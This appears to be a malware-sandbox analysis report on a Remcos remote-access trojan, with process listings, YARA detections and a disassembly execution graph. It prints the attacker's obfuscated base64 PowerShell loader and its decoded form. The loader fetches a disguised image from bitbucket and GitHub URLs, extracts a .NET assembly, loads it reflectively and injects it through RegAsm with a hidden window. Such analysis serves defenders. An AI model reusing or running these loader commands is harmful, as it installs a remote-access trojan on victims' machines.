##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#FM#bQBu#Gk#aQBG#Ek#LwBu#Gk#YQBt#C8#cwBk#GE#ZQBo#C8#cwBm#GU#cg#v#GE#bgBu#C8#QQBL#Ek#UwBF#EE#VwBV#EU#SgBJ#C8#bQBv#GM#LgB0#G4#ZQB0#G4#bwBj#HI#ZQBz#HU#YgB1#Gg#d#Bp#Gc#LgB3#GE#cg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                Imagebase:0x7ff741d30000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:3
                                Start time:02:46:52
                                Start date:24/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:6
                                Start time:02:46:53
                                Start date:24/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SmniiFI/niam/sdaeh/sfer/ann/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                                Imagebase:0x7ff741d30000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                Target ID:13
                                Start time:02:47:03
                                Start date:24/10/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Imagebase:0x5f0000
                                File size:65'440 bytes
                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2557660938.0000000000CD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:false

                                Reset < >
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1767216386.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffaaccd0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                  • Instruction ID: fa7faeeee8c1f6fe9b408104da83415c363802fb6bb87f0d4fbc13599a8abb3d
                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                  • Instruction Fuzzy Hash: 9E01847010CB088FD744EF0CE051AA6B3E0FB89320F10052EE58AC3661D622E882CB41
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1767216386.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffaaccd0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8,8$P/8$p08$-8$/8
                                  • API String ID: 0-3573041664
                                  • Opcode ID: 8836a8fa079be3b6cbe0574690ac3687743f6620024b963507a28e9cf72a9422
                                  • Instruction ID: 1027eed3cd107ff1157b8712ba523d784f0c661191789dd2c294384a14e33224
                                  • Opcode Fuzzy Hash: 8836a8fa079be3b6cbe0574690ac3687743f6620024b963507a28e9cf72a9422
                                  • Instruction Fuzzy Hash: A7317C8680F7C19FF3178BA818252796FA0AF4360171980FBE08C8F9DB94499D4DC3D6

                                  Execution Graph

                                  Execution Coverage:4.4%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:5.4%
                                  Total number of Nodes:1230
                                  Total number of Limit Nodes:77
                                  execution_graph 41502 42f042 49 API calls 2 library calls 41504 445c40 21 API calls 41506 40f846 142 API calls 41512 43e867 34 API calls 2 library calls 41513 42cc66 DeleteCriticalSection std::_Init_locks::~_Init_locks 41616 411264 140 API calls 41618 40b26d LeaveCriticalSection 41619 431e70 5 API calls 2 library calls 41622 40b27d EnterCriticalSection 41624 44160d 56 API calls 7 library calls 41520 43bc11 21 API calls 3 library calls 41627 429211 22 API calls 41521 442811 42 API calls 3 library calls 41522 401016 32 API calls __scrt_initialize_thread_safe_statics 41628 412a1d 114 API calls 41523 445c25 IsProcessorFeaturePresent 41630 42ce24 4 API calls 2 library calls 41631 438e2b 31 API calls 41525 432428 36 API calls 5 library calls 41526 40102e 29 API calls __scrt_initialize_thread_safe_statics 41528 437c34 27 API calls 3 library calls 41634 40fe3a 46 API calls 41635 404a3b 72 API calls 41636 40f6c6 69 API calls 41638 43dacf 25 API calls 2 library calls 41532 4408c9 27 API calls 5 library calls 41640 4442d4 41 API calls 3 library calls 41641 42c6d0 35 API calls _unexpected 41643 4076d7 99 API calls 41647 4086e3 80 API calls 41536 42d4e8 DecodePointer 41537 43ace9 12 API calls __wsopen_s 41538 4124ef 116 API calls 41539 4414ea GetCommandLineA GetCommandLineW 41650 4032ee 86 API calls 41540 4494f4 48 API calls 41541 4084f3 134 API calls 41542 44c4f7 98 API calls 41652 42c2f6 20 API calls 41653 4012f5 GetModuleHandleA GetProcAddress 41654 40fef5 31 API calls 41656 40fe8b 129 API calls 41657 433e93 68 API calls _free 41658 415a94 12 API calls 41084 43c698 GetLastError 41085 43c6b1 41084->41085 41086 43c6b7 41084->41086 41110 43d27d 11 API calls 2 library calls 41085->41110 41090 43c70e SetLastError 41086->41090 41103 43af95 41086->41103 41091 43c717 41090->41091 41093 43c6e6 41095 43c6d1 41093->41095 41096 43c6ed 41093->41096 41111 43beb5 20 API calls __dosmaperr 41095->41111 41113 43c486 20 API calls _Atexit 41096->41113 41097 43c6d7 41099 43c705 SetLastError 41097->41099 41099->41091 41100 43c6f8 41114 43beb5 20 API calls __dosmaperr 41100->41114 41102 43c6fe 41102->41090 41102->41099 41108 43afa2 __Getctype 41103->41108 41104 43afcd RtlAllocateHeap 41107 43afe0 41104->41107 41104->41108 41105 43afe2 41116 434256 20 API calls _Atexit 41105->41116 41107->41095 41112 43d2d3 11 API calls 2 library calls 41107->41112 41108->41104 41108->41105 41115 43864e 7 API calls 2 library calls 41108->41115 41110->41086 41111->41097 41112->41093 41113->41100 41114->41102 41115->41108 41116->41107 41661 42bea6 38 API calls 4 library calls 41556 40f4a7 277 API calls ctype 41557 415962 10 API calls 41556->41557 41558 42f8a5 45 API calls 41562 40f8b2 165 API calls 41563 4010b6 23 API calls __scrt_initialize_thread_safe_statics 41669 40cb41 GetProcAddress 41566 411542 GdipFree GdipDisposeImage ___InternalCxxFrameHandler 41670 409f48 28 API calls 41568 40ad4d 31 API calls 41672 40cb52 FreeLibrary 41674 40f75c 47 API calls 41572 402967 11 API calls 41676 40ff69 140 API calls 41678 40ab70 62 API calls 41680 43d77b 60 API calls 2 library calls 41574 401179 31 API calls __scrt_initialize_thread_safe_statics 41682 438b03 49 API calls 3 library calls 41683 40f6ee 88 API calls 41684 40ab02 77 API calls 41685 42c30a 28 API calls 2 library calls 41686 405f0b FindClose 41687 428b0e 23 API calls 41580 43fd0e 99 API calls __wsopen_s 41581 40a111 21 API calls std::bad_exception::bad_exception 41582 42c113 43 API calls 7 library calls 41583 449d1c CloseHandle 41584 40511a 204 API calls ___scrt_get_show_window_mode 41692 43c71d 22 API calls _Atexit 41693 40ab1e 63 API calls 41585 444524 39 API calls 3 library calls 41694 409b24 43 API calls __Tolower 41696 43db25 21 API calls 41587 441d2d GetProcessHeap 41698 43972c 8 API calls ___vcrt_uninitialize 41699 40cb33 LoadLibraryA 41589 402939 22 API calls 41701 42c339 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 41702 40e33b 47 API calls 41705 4013cd 24 API calls __scrt_initialize_thread_safe_statics 41706 42e7d0 6 API calls 4 library calls 40057 42c1d1 40058 42c1dd ___DestructExceptionObject 40057->40058 40084 42bca4 40058->40084 40060 42c1e4 40062 42c20d 40060->40062 40247 42c576 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 40060->40247 40068 42c24c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 40062->40068 40248 43991f 5 API calls TranslatorGuardHandler 40062->40248 40064 42c226 40066 42c22c ___DestructExceptionObject 40064->40066 40249 4398c3 5 API calls TranslatorGuardHandler 40064->40249 40067 42c2ac 40095 42c691 40067->40095 40068->40067 40250 438ab5 35 API calls 4 library calls 40068->40250 40077 42c2ce 40078 42c2d8 40077->40078 40252 438aed 28 API calls _Atexit 40077->40252 40080 42c2e1 40078->40080 40253 438a90 28 API calls _Atexit 40078->40253 40254 42be1b 13 API calls 2 library calls 40080->40254 40083 42c2e9 40083->40066 40085 42bcad 40084->40085 40255 42c3c6 IsProcessorFeaturePresent 40085->40255 40087 42bcb9 40256 42e743 10 API calls 4 library calls 40087->40256 40089 42bcbe 40090 42bcc2 40089->40090 40257 4397ac 40089->40257 40090->40060 40093 42bcd9 40093->40060 40266 42ec70 40095->40266 40098 42c2b2 40099 439870 40098->40099 40268 441239 40099->40268 40101 42c2bb 40104 40a1d6 40101->40104 40102 439879 40102->40101 40272 43bf48 35 API calls 40102->40272 40274 414eed LoadLibraryA GetProcAddress 40104->40274 40106 40a1f2 GetModuleFileNameW 40279 40a60c 40106->40279 40108 40a20e 40294 4021e0 40108->40294 40111 4021e0 28 API calls 40112 40a22c 40111->40112 40300 414384 40112->40300 40116 40a23e 40326 4034fa 40116->40326 40119 40a2a7 40332 4034cf 40119->40332 40121 40a2b5 40124 4034cf 22 API calls 40121->40124 40122 40a25d 40559 40aa8b 116 API calls 40122->40559 40125 40a2c3 40124->40125 40337 402a91 40125->40337 40126 40a26f 40128 4034cf 22 API calls 40126->40128 40130 40a27b 40128->40130 40560 40be14 36 API calls 2 library calls 40130->40560 40136 40a28d 40561 40aa3c 77 API calls 40136->40561 40140 40a296 40562 40a5f9 70 API calls 40140->40562 40141 402091 11 API calls 40143 40a2fc 40141->40143 40145 4034cf 22 API calls 40143->40145 40144 40a29f 40146 402091 11 API calls 40144->40146 40147 40a305 40145->40147 40148 40a334 40146->40148 40361 402077 40147->40361 40251 4389c4 GetModuleHandleW 40148->40251 40150 40a310 40365 4087ef 40150->40365 40152 40a324 40152->40144 40153 40a33f 40152->40153 40368 4139a6 40153->40368 40155 40a34f 40156 4034cf 22 API calls 40155->40156 40157 40a368 40156->40157 40385 414225 40157->40385 40159 40a373 40389 4064d4 40159->40389 40164 4034cf 22 API calls 40165 40a390 40164->40165 40166 4034cf 22 API calls 40165->40166 40167 40a399 40166->40167 40168 4034cf 22 API calls 40167->40168 40169 40a3a2 40168->40169 40170 4034cf 22 API calls 40169->40170 40171 40a3ab 40170->40171 40172 40a41e 40171->40172 40173 4034cf 22 API calls 40171->40173 40174 4034cf 22 API calls 40172->40174 40176 40a3c0 40173->40176 40175 40a429 40174->40175 40401 402178 40175->40401 40176->40172 40176->40176 40179 4034cf 22 API calls 40176->40179 40178 40a43b 40407 40d202 RegCreateKeyA 40178->40407 40181 40a3e4 40179->40181 40185 4034cf 22 API calls 40181->40185 40183 4034cf 22 API calls 40184 40a45d 40183->40184 40413 433426 40184->40413 40186 40a3f6 40185->40186 40563 40900f 31 API calls 40186->40563 40190 40a409 40192 4064d4 28 API calls 40190->40192 40191 40a47a 40564 415128 86 API calls ___scrt_get_show_window_mode 40191->40564 40195 40a415 40192->40195 40193 40a495 40194 402178 28 API calls 40193->40194 40197 40a4a4 40194->40197 40198 4034ff 11 API calls 40195->40198 40200 402178 28 API calls 40197->40200 40198->40172 40199 40a489 CreateThread 40199->40193 41077 415962 10 API calls 40199->41077 40201 40a4b4 40200->40201 40417 413bcc 40201->40417 40206 4064d4 28 API calls 40207 40a4d0 40206->40207 40208 4034ff 11 API calls 40207->40208 40209 40a4d9 40208->40209 40210 40a4e2 SetProcessDEPPolicy 40209->40210 40211 40a4e5 CreateThread 40209->40211 40210->40211 40212 40a4fa 40211->40212 41052 40a6c0 40211->41052 40213 40a540 40212->40213 40214 402178 28 API calls 40212->40214 40452 40cf8c RegOpenKeyExA 40213->40452 40215 40a514 40214->40215 40565 402a6d 28 API calls 40215->40565 40218 40a524 40221 402178 28 API calls 40218->40221 40220 40a5ee 40463 4092fd 40220->40463 40223 40a52f 40221->40223 40222 414225 28 API calls 40225 40a56d 40222->40225 40226 413bcc 79 API calls 40223->40226 40455 40d0a8 RegOpenKeyExW 40225->40455 40228 40a534 40226->40228 40230 402091 11 API calls 40228->40230 40230->40213 40231 40a5f8 40234 4034ff 11 API calls 40237 40a589 40234->40237 40235 40a5b1 DeleteFileW 40236 40a5b8 40235->40236 40235->40237 40238 414225 28 API calls 40236->40238 40237->40235 40237->40236 40239 40a59f Sleep 40237->40239 40240 40a5c8 40238->40240 40241 404c42 40239->40241 40460 40d444 RegOpenKeyExW 40240->40460 40241->40235 40244 4034ff 11 API calls 40245 40a5e5 40244->40245 40246 4034ff 11 API calls 40245->40246 40246->40220 40247->40060 40248->40064 40249->40068 40250->40067 40251->40077 40252->40078 40253->40080 40254->40083 40255->40087 40256->40089 40261 441d48 40257->40261 40260 42e76c 8 API calls 3 library calls 40260->40090 40264 441d61 40261->40264 40263 42bccb 40263->40093 40263->40260 40265 42c8db 5 API calls ___raise_securityfailure 40264->40265 40265->40263 40267 42c6a4 GetStartupInfoW 40266->40267 40267->40098 40269 441242 40268->40269 40271 44124b 40268->40271 40273 441138 48 API calls 5 library calls 40269->40273 40271->40102 40272->40102 40273->40271 40275 414f1a GetModuleHandleA GetProcAddress 40274->40275 40276 414f2e LoadLibraryA GetProcAddress 40274->40276 40275->40276 40277 414f46 LoadLibraryA GetProcAddress 40276->40277 40278 414f5a 44 API calls 40276->40278 40277->40278 40278->40106 40566 413b85 FindResourceA 40279->40566 40283 40a639 ctype 40578 40219f 40283->40578 40286 40209b 28 API calls 40287 40a65e 40286->40287 40288 402091 11 API calls 40287->40288 40289 40a666 40288->40289 40290 432316 new 21 API calls 40289->40290 40291 40a679 ctype 40290->40291 40584 404964 40291->40584 40293 40a6b0 40293->40108 40295 4021f6 40294->40295 40296 402261 11 API calls 40295->40296 40297 402210 40296->40297 40298 402405 28 API calls 40297->40298 40299 40221e 40298->40299 40299->40111 40621 4021c9 40300->40621 40302 402091 11 API calls 40303 414439 40302->40303 40305 402091 11 API calls 40303->40305 40304 414409 40627 402006 28 API calls 40304->40627 40306 414441 40305->40306 40309 402091 11 API calls 40306->40309 40312 40a235 40309->40312 40310 414415 40313 40209b 28 API calls 40310->40313 40311 414397 40311->40304 40314 40209b 28 API calls 40311->40314 40317 402091 11 API calls 40311->40317 40321 414407 40311->40321 40625 402006 28 API calls 40311->40625 40626 4151df 28 API calls 40311->40626 40322 40a9e5 40312->40322 40315 41441e 40313->40315 40314->40311 40316 402091 11 API calls 40315->40316 40318 414426 40316->40318 40317->40311 40628 4151df 28 API calls 40318->40628 40321->40302 40323 40a9f3 40322->40323 40325 40a9fa 40322->40325 40629 40353b 11 API calls 40323->40629 40325->40116 40328 40353b 40326->40328 40327 403577 40327->40119 40327->40122 40328->40327 40630 4036b8 11 API calls 40328->40630 40330 40355c 40631 4036a1 11 API calls std::_Deallocate 40330->40631 40333 4034da 40332->40333 40335 4034e1 40333->40335 40632 403530 22 API calls 40333->40632 40335->40121 40338 4021c9 11 API calls 40337->40338 40339 402aa0 40338->40339 40633 402ba1 40339->40633 40341 402abb 40637 40206e 40341->40637 40344 404804 40653 40203c 40344->40653 40346 404814 40657 40210e 40346->40657 40349 40209b 40350 4020aa 40349->40350 40357 4020f2 40349->40357 40351 402261 11 API calls 40350->40351 40352 4020b3 40351->40352 40353 4020f5 40352->40353 40355 4020ce 40352->40355 40354 4025a1 11 API calls 40353->40354 40354->40357 40680 402aef 28 API calls 40355->40680 40358 402091 40357->40358 40359 402261 11 API calls 40358->40359 40360 40209a 40359->40360 40360->40141 40362 402082 40361->40362 40363 40208a 40361->40363 40681 40247c 28 API calls 40362->40681 40363->40150 40682 402028 40365->40682 40367 4087f9 CreateMutexA GetLastError 40367->40152 40684 414452 40368->40684 40373 40209b 28 API calls 40374 4139e2 40373->40374 40375 402091 11 API calls 40374->40375 40376 4139ea 40375->40376 40377 40d033 31 API calls 40376->40377 40379 413a3d 40376->40379 40378 413a10 40377->40378 40380 413a1b StrToIntA 40378->40380 40379->40155 40381 413a32 40380->40381 40382 413a29 40380->40382 40384 402091 11 API calls 40381->40384 40692 415327 22 API calls 40382->40692 40384->40379 40386 41423e 40385->40386 40693 4152d6 40386->40693 40388 414246 40388->40159 40390 4064e3 40389->40390 40397 40652b 40389->40397 40391 4035a8 11 API calls 40390->40391 40392 4064ec 40391->40392 40393 40652e 40392->40393 40395 406507 40392->40395 40726 406821 40393->40726 40725 406cb1 28 API calls 40395->40725 40398 4034ff 40397->40398 40399 4035a8 11 API calls 40398->40399 40400 403508 40399->40400 40400->40164 40402 402183 40401->40402 40403 402261 11 API calls 40402->40403 40404 40218e 40403->40404 40730 402387 40404->40730 40408 40d252 40407->40408 40411 40d21b 40407->40411 40409 402091 11 API calls 40408->40409 40410 40a451 40409->40410 40410->40183 40412 40d22d RegSetValueExA RegCloseKey 40411->40412 40412->40408 40414 43343f swprintf 40413->40414 40734 432649 40414->40734 40416 40a46a 40416->40191 40416->40193 40418 413be2 GetLocalTime 40417->40418 40419 413c7d 40417->40419 40420 402a91 28 API calls 40418->40420 40421 402091 11 API calls 40419->40421 40422 413c24 40420->40422 40423 413c85 40421->40423 40424 404804 28 API calls 40422->40424 40425 402091 11 API calls 40423->40425 40426 413c30 40424->40426 40427 40a4b9 40425->40427 40762 404779 40426->40762 40441 413cea GetComputerNameExW GetUserNameW 40427->40441 40430 404804 28 API calls 40431 413c48 40430->40431 40767 413981 76 API calls 40431->40767 40433 413c56 40434 402091 11 API calls 40433->40434 40435 413c62 40434->40435 40436 402091 11 API calls 40435->40436 40437 413c6b 40436->40437 40438 402091 11 API calls 40437->40438 40439 413c74 40438->40439 40440 402091 11 API calls 40439->40440 40440->40419 40771 403509 40441->40771 40448 4034ff 11 API calls 40449 413d58 40448->40449 40450 4034ff 11 API calls 40449->40450 40451 40a4c5 40450->40451 40451->40206 40453 40cfad RegQueryValueExA RegCloseKey 40452->40453 40454 40a558 40452->40454 40453->40454 40454->40220 40454->40222 40456 40d107 40455->40456 40457 40d0d8 RegQueryValueExW RegCloseKey 40455->40457 40458 403509 28 API calls 40456->40458 40457->40456 40459 40a57e 40458->40459 40459->40234 40461 40d460 RegDeleteValueW 40460->40461 40462 40a5db 40460->40462 40461->40462 40462->40244 40464 409316 40463->40464 40465 40cf8c 3 API calls 40464->40465 40466 40931d 40465->40466 40470 40933c 40466->40470 40841 4087e7 40466->40841 40468 40932a 40844 40d310 RegCreateKeyA 40468->40844 40471 40e92f 40470->40471 40472 4021c9 11 API calls 40471->40472 40473 40e943 40472->40473 40858 413e9d 40473->40858 40476 4021c9 11 API calls 40477 40e959 40476->40477 40478 4034cf 22 API calls 40477->40478 40479 40e967 40478->40479 40480 433426 39 API calls 40479->40480 40481 40e974 40480->40481 40482 40e986 40481->40482 40483 40e979 Sleep 40481->40483 40484 402178 28 API calls 40482->40484 40483->40482 40485 40e995 40484->40485 40486 4034cf 22 API calls 40485->40486 40487 40e99e 40486->40487 40488 4021e0 28 API calls 40487->40488 40489 40e9a9 40488->40489 40490 414384 28 API calls 40489->40490 40491 40e9b1 40490->40491 40862 4016e4 WSAStartup 40491->40862 40493 40e9bb 40494 4034cf 22 API calls 40493->40494 40495 40e9c4 40494->40495 40496 4034cf 22 API calls 40495->40496 40522 40ea43 40495->40522 40497 40e9dd 40496->40497 40499 4034cf 22 API calls 40497->40499 40498 4021e0 28 API calls 40498->40522 40500 40e9ee 40499->40500 40502 4034cf 22 API calls 40500->40502 40501 414384 28 API calls 40501->40522 40503 40e9ff 40502->40503 40504 4034cf 22 API calls 40503->40504 40506 40ea10 40504->40506 40508 4034cf 22 API calls 40506->40508 40507 40209b 28 API calls 40507->40522 40509 40ea21 40508->40509 40511 4034cf 22 API calls 40509->40511 40510 402091 11 API calls 40510->40522 40512 40ea33 40511->40512 40972 401585 88 API calls 40512->40972 40514 404804 28 API calls 40514->40522 40515 4034cf 22 